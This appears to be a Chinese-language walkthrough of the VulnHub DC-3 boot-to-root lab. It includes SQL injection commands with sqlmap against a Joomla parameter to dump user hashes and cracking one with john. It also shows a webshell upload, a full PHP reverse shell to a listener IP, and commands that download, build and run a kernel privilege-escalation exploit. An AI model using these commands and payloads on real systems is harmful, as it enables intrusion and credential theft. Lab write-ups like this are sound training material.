神出鬼没的Enderman

靶机信息

• https://www.vulnhub.com/entry/dc-2,311/

DESCRIPTION
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).

If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.

TECHNICAL INFORMATION
DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.

Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

This works better with VirtualBox rather than VMware ## Changelog v3.2 - 2020-04-25 v3.0 - 2019-03-26

信息收集

部署完靶机后扫描nmap获得ip地址,一个是kali的ip,另一个就是靶机的ip,之后再扫描主机的开放端口

#ping扫描网段内的主机
nmap -sP 10.0.0.0/24
#扫描主机端口
nmap -sV -p- 10.0.0.19

根据提示只有1个入口,访问80端口

使用whatweb获取信息

whatweb 10.0.0.19

joomla

使用joomscan扫描网站,获得以下信息

joomscan -u http://10.0.0.19

使用searchspolit搜索漏洞

flag1

发现sql注入漏洞,使用sqlmap利用漏洞获取数据库信息

sqlmap -u "http://10.0.0.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

获得库名后一步步获取信息获得加密码后的登录密码

sqlmap -u "http://10.0.0.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

使用john爆破hash值

cat >>  pass << EOF
\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
EOF
john pass

使用账号密码登录网站,在网站中发现上传点,可以上传木马获取服务器权限

找到对应路径,部署小马

使用中国蚁剑连接

获得反弹shell

#reverse.php
<?php
$sock = fsockopen("10.0.0.221", 1234);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

使用searchsploit搜索漏洞

获取文件并执行漏洞

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput